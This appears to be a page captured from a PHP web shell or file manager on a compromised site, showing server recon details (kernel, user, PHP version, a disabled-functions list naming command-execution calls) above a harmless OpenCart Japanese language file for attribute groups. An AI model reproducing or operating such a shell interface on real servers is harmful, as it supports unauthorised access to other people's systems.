HEX
Server: nginx/1.28.1
System: Linux 10-41-63-61 6.8.0-31-generic #31-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 20 00:40:06 UTC 2024 x86_64
User: www (1001)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/www.zqgwfu.top/admin/language/ja-jp/catalog/attribute_group.php
<?php
// Heading
$_['heading_title']     = '属性グループ管理';

// Text
$_['text_success']      = '成功: 属性グループを更新しました!';
$_['text_list']         = '属性グループリスト';
$_['text_add']          = '属性グループの追加';
$_['text_edit']         = '属性グループの編集';

// Column
$_['column_name']       = '属性グループ名';
$_['column_sort_order'] = '表示順';
$_['column_action']     = '処理';

// Entry
$_['entry_name']        = '属性グループ名';
$_['entry_sort_order']  = '表示順';

// Error
$_['error_permission']  = '警告:属性グループを更新する権限がありません!';
$_['error_name']        = '属性グループ名は3文字以上64文字以下で入力してください!';
$_['error_attribute']   = '警告: この属性グループは、現在 %s 件の属性に使用されているため、削除できません!';
$_['error_product']     = '警告: この属性グループは、現在 %s 点の商品に使用されているため、削除できません!';